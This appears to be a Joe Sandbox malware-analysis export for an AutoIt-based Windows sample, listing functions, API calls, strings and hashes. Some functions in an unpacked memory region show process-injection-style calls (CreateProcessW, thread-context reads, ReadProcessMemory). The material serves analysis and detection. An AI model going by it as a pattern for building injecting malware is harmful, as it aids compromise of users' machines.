Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd

Similarity

API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
String ID: +$0$AutoIt v3 GUI$TaskbarCreated
API String ID: 2914291525-1005189915
Opcode ID: af01b952168500d14eb1f3786789e612a8c3163eb5b0e66b1d5f0102ae115ea7
Instruction ID: 52e5e28e23f766e678b1fb6528765c3664bfce7b3b385c6f843be640775ab4fa
Opcode Fuzzy Hash: af01b952168500d14eb1f3786789e612a8c3163eb5b0e66b1d5f0102ae115ea7
Instruction Fuzzy Hash: FF21E3B1951309AFEB00DFA5EC4DBDDBBB8FB08701F20411AF911A62A0E7B14554CF98

Function 0020065B Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 272
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0020039A: CreateFileW.KERNELBASE(00000000,00000000,?,00200704,?,?,00000000,?,00200704,00000000,0000000C), ref: 002003B7

GetLastError.KERNEL32 ref: 0020076F
__dosmaperr.LIBCMT ref: 00200776
GetFileType.KERNELBASE(00000000), ref: 00200782
GetLastError.KERNEL32 ref: 0020078C
__dosmaperr.LIBCMT ref: 00200795
CloseHandle.KERNEL32(00000000), ref: 002007B5
CloseHandle.KERNEL32(?), ref: 002008FF
GetLastError.KERNEL32 ref: 00200931
__dosmaperr.LIBCMT ref: 00200938

Strings

H, xrefs: 002008BD

Memory Dump Source

Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd

Similarity

API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
String ID: H
API String ID: 4237864984-2852464175
Opcode ID: 7a03bfa2c78a8d21cc3d1174085b9f09dacd33baa6d914a11c71c7ddb48efafa
Instruction ID: fe3b524b73ad9503090fd0b14accc49dcae74bf5800518cd2d42eb04205bbcf6
Opcode Fuzzy Hash: 7a03bfa2c78a8d21cc3d1174085b9f09dacd33baa6d914a11c71c7ddb48efafa
Instruction Fuzzy Hash: 77A14A32A202498FEF19AF68D8957AD7BA0EB06320F14015DF8159B2D2DB359D23CB51

Function 001C344D Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 201
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 001C3A5A: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,00291418,?,001C2E7F,?,?,?,00000000), ref: 001C3A78

Part of subcall function 001C3357: GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 001C3379

RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 001C356A
RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 0020318D
RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 002031CE
RegCloseKey.ADVAPI32(?), ref: 00203210
_wcslen.LIBCMT ref: 00203277
_wcslen.LIBCMT ref: 00203286

Strings

\Include\, xrefs: 001C3527
Software\AutoIt v3\AutoIt, xrefs: 001C3560
\, xrefs: 0020328C
Include, xrefs: 00203184, 002031C5

Memory Dump Source

Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd

Similarity

API ID: NameQueryValue_wcslen$CloseFileFullModuleOpenPath
String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
API String ID: 98802146-2727554177
Opcode ID: aea90ff8428cb018b9e25c9754df83d0358a41867bfeabab347307d0bb7228a5
Instruction ID: 593ab680528f93d21bec0fda644f84b33e356136661573e3a7f7f74df59084aa
Opcode Fuzzy Hash: aea90ff8428cb018b9e25c9754df83d0358a41867bfeabab347307d0bb7228a5
Instruction Fuzzy Hash: 91717C71415301EEC314EF65EC8A9ABBBE8FFA9340B50056EF845931A1EB30DA4CCB59

Function 001C2B83 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 63
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32(0000000F), ref: 001C2B8E
LoadCursorW.USER32(00000000,00007F00), ref: 001C2B9D
LoadIconW.USER32(00000063), ref: 001C2BB3
LoadIconW.USER32(000000A4), ref: 001C2BC5
LoadIconW.USER32(000000A2), ref: 001C2BD7
LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 001C2BEF
RegisterClassExW.USER32(?), ref: 001C2C40

Part of subcall function 001C2CD4: GetSysColorBrush.USER32(0000000F), ref: 001C2D07
Part of subcall function 001C2CD4: RegisterClassExW.USER32(00000030), ref: 001C2D31
Part of subcall function 001C2CD4: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 001C2D42
Part of subcall function 001C2CD4: InitCommonControlsEx.COMCTL32(?), ref: 001C2D5F
Part of subcall function 001C2CD4: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 001C2D6F
Part of subcall function 001C2CD4: LoadIconW.USER32(000000A9), ref: 001C2D85
Part of subcall function 001C2CD4: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 001C2D94

Strings

AutoIt v3, xrefs: 001C2C2F
#, xrefs: 001C2C16
0, xrefs: 001C2C0F

Memory Dump Source

Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd

Similarity

API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
String ID: #$0$AutoIt v3
API String ID: 423443420-4155596026
Opcode ID: 14dd8d7e9d65740e1728f0528fa4aed0735620601a4ac42317c9651f92ed7648
Instruction ID: 0efa8d3367fc69e384f8ee784cdf51c3fbe49fab3e09c884c74162abc5eaeaa7
Opcode Fuzzy Hash: 14dd8d7e9d65740e1728f0528fa4aed0735620601a4ac42317c9651f92ed7648
Instruction Fuzzy Hash: DA213A70E10315AFDB109FA6FC4DBA9BFB4FB08B50F14019BE504A66A0D3B14560CF98

Function 001C3170 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 145
windowtimeregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DefWindowProcW.USER32(?,?,?,?,?,?,?,?,?,001C316A,?,?), ref: 001C31D8
KillTimer.USER32(?,00000001,?,?,?,?,?,001C316A,?,?), ref: 001C3204
SetTimer.USER32(?,00000001,000002EE,00000000), ref: 001C3227
RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,?,?,001C316A,?,?), ref: 001C3232
CreatePopupMenu.USER32 ref: 001C3246
PostQuitMessage.USER32(00000000), ref: 001C3267

Strings

TaskbarCreated, xrefs: 001C322D

Memory Dump Source

Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd

Similarity

API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
String ID: TaskbarCreated
API String ID: 129472671-2362178303
Opcode ID: 318bf85ca1532f5d8ce580802ee797ae68e401036f3eb77bff863a749ad73e8e
Instruction ID: 6dd3c8b1c96906b2d5a9318e62ca9edebd756ae71cac2fcff7b57ff3954ec458
Opcode Fuzzy Hash: 318bf85ca1532f5d8ce580802ee797ae68e401036f3eb77bff863a749ad73e8e
Instruction Fuzzy Hash: 71413A35250302AFDF192B78ED0DFB93A29E729340F18811EF522856E2D770DE20DB65

Function 001CDFD0 Relevance: 15.4, APIs: 2, Strings: 6, Instructions: 1414COMMON

Download Yara Rule

Strings

D%), xrefs: 0021302D
D%), xrefs: 00212FDA
Variable must be of type 'Object'., xrefs: 002132B7
D%), xrefs: 001CE1E0
D%)D%), xrefs: 001CE27E
D%), xrefs: 001CE4B1

Memory Dump Source

Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd

Similarity

API ID:
String ID: D%)$D%)$D%)$D%)$D%)D%)$Variable must be of type 'Object'.
API String ID: 0-1317950358
Opcode ID: a5a047458195d3bd3b1c37e585a241a1aa86a48635581d304d17624cbb183575
Instruction ID: f0b8ebd9576286bb7f176da6c339e2b48e2bcce904791ffe8ddeb678c4de793d
Opcode Fuzzy Hash: a5a047458195d3bd3b1c37e585a241a1aa86a48635581d304d17624cbb183575
Instruction Fuzzy Hash: 62C26A71A00215DFCB24CF98C884FADB7F1BB28310F258569E916AB391D375EE91CB91

Function 001F8D45 Relevance: 13.8, APIs: 9, Instructions: 300
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 397e2a1650b8dc9126f4ac4123b8b032742b202da1a0f451596b5c6596db5cfa
Instruction ID: d28cbf7cd4cf8f708ed8d5b3a2a3cdec002138b5606fdb6725ba22eca84d1530
Opcode Fuzzy Hash: 397e2a1650b8dc9126f4ac4123b8b032742b202da1a0f451596b5c6596db5cfa
Instruction Fuzzy Hash: 82C1F275A0434DAFCB11EFA9D845BBDBBB4BF19310F144199FA19A7392CB318942CB60

Function 016856E8 Relevance: 10.7, APIs: 7, Instructions: 239
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 016857B9
VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 016859DF

Memory Dump Source

Source File: 00000000.00000002.1708037599.0000000001683000.00000040.00000020.00020000.00000000.sdmp, Offset: 01683000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1683000_K3xL5Xy0XS.jbxd

Similarity

API ID: CreateFileFreeVirtual
String ID:
API String ID: 204039940-0
Opcode ID: 014c9b5c74d83c0a726ef6016946af978a068631e2f3efa1e9065a42f07dad7c
Instruction ID: 7322735a5f4ac385548dbf15a40dde41c17ab9668ac81e31fe1f25c694076716
Opcode Fuzzy Hash: 014c9b5c74d83c0a726ef6016946af978a068631e2f3efa1e9065a42f07dad7c
Instruction Fuzzy Hash: BAA11770E00219EBDF14DFA4C884BEEBBB5BF49315F208259E212BB281D7759A41CF95

Function 001C2C63 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 001C2C91
CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 001C2CB2
ShowWindow.USER32(00000000,?,?,?,?,?,?,001C1CAD,?), ref: 001C2CC6
ShowWindow.USER32(00000000,?,?,?,?,?,?,001C1CAD,?), ref: 001C2CCF

Strings

edit, xrefs: 001C2CAC
AutoIt v3, xrefs: 001C2C89, 001C2C8E, 001C2C8F

Memory Dump Source

Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd

Similarity

API ID: Window$CreateShow
String ID: AutoIt v3$edit
API String ID: 1584632944-3779509399
Opcode ID: 09275ad0623f943ccfac0762e32e3184e240aa1a4c0dbda73feccb4c63c9cb3a
Instruction ID: 0e4c5fe11fc601944d2dcf43fd8dc0f46a30c6fe00748835b2e066b9ba8b0bf5
Opcode Fuzzy Hash: 09275ad0623f943ccfac0762e32e3184e240aa1a4c0dbda73feccb4c63c9cb3a
Instruction Fuzzy Hash: 5EF0D4756403917EEB311B27BC0CEB76EBDD7CAF61B10009AF904A25A0D6715864DAB8

Function 016854B8 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 145
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 016853A8: Sleep.KERNELBASE(000001F4), ref: 016853B9

CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 016855DF

Strings

ZJQMPMQNEZON2, xrefs: 01685642, 01685645

Memory Dump Source

Source File: 00000000.00000002.1708037599.0000000001683000.00000040.00000020.00020000.00000000.sdmp, Offset: 01683000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1683000_K3xL5Xy0XS.jbxd

Similarity

API ID: CreateFileSleep
String ID: ZJQMPMQNEZON2
API String ID: 2694422964-2918389996
Opcode ID: 97ff0b9ab20aeb35f064bcdb974fadfac93b9586a984f2108b4ff4f2bfabbdd1
Instruction ID: 0b7e8d012f3da7e71241ae6361f263aada79154b78e866c58a9d945aeb95cbd3
Opcode Fuzzy Hash: 97ff0b9ab20aeb35f064bcdb974fadfac93b9586a984f2108b4ff4f2bfabbdd1
Instruction Fuzzy Hash: 9551AF30D04259EBEF11EBA4DC15BEEBB79AF18304F004299E609BB2C1D7B91B45CB65

Function 00232947 Relevance: 7.8, APIs: 5, Instructions: 313
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00232C05
DeleteFileW.KERNEL32(?), ref: 00232C87
CopyFileW.KERNEL32(?,?,00000000,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00232C9D
DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00232CAE
DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00232CC0

Memory Dump Source

Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd

Similarity

API ID: File$Delete$Copy
String ID:
API String ID: 3226157194-0
Opcode ID: e5c59daa809b9d8f77b2d4b5f66751a063d70c5e450a6ee68383b9b8b2212f97
Instruction ID: adf8056edf935cdc4c95a41997191406768ecdc71992206ec545b7d1299b681c
Opcode Fuzzy Hash: e5c59daa809b9d8f77b2d4b5f66751a063d70c5e450a6ee68383b9b8b2212f97
Instruction Fuzzy Hash: 44B15FB1D10219ABDF21DFA4CC85EDEB7BDEF58350F1040A6F509E6141EB30AA588F61

Function 001C3B1C Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,?,?,80000001,80000001,?,001C3B0F,SwapMouseButtons,00000004,?), ref: 001C3B40
RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,?,80000001,80000001,?,001C3B0F,SwapMouseButtons,00000004,?), ref: 001C3B61
RegCloseKey.KERNELBASE(00000000,?,?,?,80000001,80000001,?,001C3B0F,SwapMouseButtons,00000004,?), ref: 001C3B83

Strings

Control Panel\Mouse, xrefs: 001C3B3E

Memory Dump Source

Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd

Similarity

API ID: CloseOpenQueryValue
String ID: Control Panel\Mouse
API String ID: 3677997916-824357125
Opcode ID: 5b67070d417f467cf636e017c857964c551e3638dce55ad416bdb940a01db89b
Instruction ID: da04bfe7b7ffef06207fdee78a6558ddb5a01f2f77c9fdfecbe453351dcde80c
Opcode Fuzzy Hash: 5b67070d417f467cf636e017c857964c551e3638dce55ad416bdb940a01db89b
Instruction Fuzzy Hash: E31118B5510208FEDB218FA5DC48FAEB7B8EF14755B108459A815D7210E331DE409B64

Function 016843A8 Relevance: 6.7, APIs: 4, Instructions: 720processthreadCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNELBASE(?,00000000), ref: 01684BD5
Wow64GetThreadContext.KERNEL32(?,00010007), ref: 01684BF9
ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 01684C1B

Memory Dump Source

Source File: 00000000.00000002.1708037599.0000000001683000.00000040.00000020.00020000.00000000.sdmp, Offset: 01683000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1683000_K3xL5Xy0XS.jbxd

Similarity

API ID: Process$ContextCreateMemoryReadThreadWow64
String ID:
API String ID: 2438371351-0
Opcode ID: b6a4c29ec9195df02a43fc4b15474606dfbde67be6cfae9816a363b0bdbc2b3f
Instruction ID: a9882d25acd3b71d071e62a92c19f0b15480b71c5718bcff2ad19521c08fdbb9
Opcode Fuzzy Hash: b6a4c29ec9195df02a43fc4b15474606dfbde67be6cfae9816a363b0bdbc2b3f
Instruction Fuzzy Hash: FF62FA70A142199BEB24DFA4CC44BDEB776EF58300F1091A9D20DEB390EB759E81CB59

Function 001C3923 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 94windowCOMMON

Download Yara Rule

APIs

LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 002033A2

Part of subcall function 001C6B57: _wcslen.LIBCMT ref: 001C6B6A

Shell_NotifyIconW.SHELL32(00000001,?), ref: 001C3A04

Strings

Line: , xrefs: 002033EB

Memory Dump Source

Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd

Similarity

API ID: IconLoadNotifyShell_String_wcslen
String ID: Line:
API String ID: 2289894680-1585850449
Opcode ID: 605cef0ebff2b939fd0fbf3ae8ed5ba2480fb0d0d812d645f710c813a8165fe5
Instruction ID: beecf2fcefb5fb4c25b70807a45109241c5743cce4f65fe07035a4a71f15d3d3
Opcode Fuzzy Hash: 605cef0ebff2b939fd0fbf3ae8ed5ba2480fb0d0d812d645f710c813a8165fe5
Instruction Fuzzy Hash: 7031E571408341AAD725EB20EC49FEBB3E8AB64314F00496EF4A9831D1DB70DA58C7C6

Function 001C2DE3 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 64COMMON

Download Yara Rule

APIs

GetOpenFileNameW.COMDLG32(?), ref: 00202C8C

Part of subcall function 001C3AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,001C3A97,?,?,001C2E7F,?,?,?,00000000), ref: 001C3AC2

Part of subcall function 001C2DA5: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 001C2DC4

Strings

X, xrefs: 00202C5A
`e(, xrefs: 00202C85

Memory Dump Source

Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd

Similarity

API ID: Name$Path$FileFullLongOpen
String ID: X$`e(
API String ID: 779396738-2230957894
Opcode ID: 883497445d62c915f633039cd6fc5bdb62997d24dabedc37fce2d4857d10511e
Instruction ID: ce76a9642683c0737f1bf90d64d047fb6141af7a4d19d781fd82fd91dcf388cf
Opcode Fuzzy Hash: 883497445d62c915f633039cd6fc5bdb62997d24dabedc37fce2d4857d10511e
Instruction Fuzzy Hash: 8B21D870A103589FDB01EF94C809BEE7BFCAF58304F00805EE405B7281DBB499598F61

Function 001DFDDB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43COMMON

Download Yara Rule

APIs

__CxxThrowException@8.LIBVCRUNTIME ref: 001E0668

Part of subcall function 001E32A4: RaiseException.KERNEL32(?,?,?,001E068A,?,00291444,?,?,?,?,?,?,001E068A,001C1129,00288738,001C1129), ref: 001E3304

__CxxThrowException@8.LIBVCRUNTIME ref: 001E0685

Strings

Unknown exception, xrefs: 001E0692

Memory Dump Source

Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd

Similarity

API ID: Exception@8Throw$ExceptionRaise
String ID: Unknown exception
API String ID: 3476068407-410509341
Opcode ID: 1d20638b991c069cb41984aad248272404f4c8d0f254ac202e6f30874699a152
Instruction ID: 2435987e719a0ec7e4740d2ba5580999f26d37e5f3b67ff53935aa21814bb3fb
Opcode Fuzzy Hash: 1d20638b991c069cb41984aad248272404f4c8d0f254ac202e6f30874699a152
Instruction Fuzzy Hash: 3CF04634800A8D73CB04BAA6DC4AD9E7B7D5E14300BA04135F924D65D1EFB1DBA6CAC0

Function 00233017 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 18COMMON

Download Yara Rule

APIs

GetTempPathW.KERNEL32(00000104,?,00000001), ref: 0023302F
GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 00233044

Strings

aut, xrefs: 00233038

Memory Dump Source

Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd

Similarity

API ID: Temp$FileNamePath
String ID: aut
API String ID: 3285503233-3010740371
Opcode ID: 76b333ec0cf6d6e8292ffcbf76fe77ec362c7689337191c3b70bbd9a5cdf0042
Instruction ID: 31bf7a55290bab5eddfefffdef5dffbd63679e2b4199cbc35beab45eb424a02c
Opcode Fuzzy Hash: 76b333ec0cf6d6e8292ffcbf76fe77ec362c7689337191c3b70bbd9a5cdf0042
Instruction Fuzzy Hash: 77D05E765003286BDA20A7A4AC4EFCB3A6CDB05751F0002A1BA55E20D1EAB09984CBD4

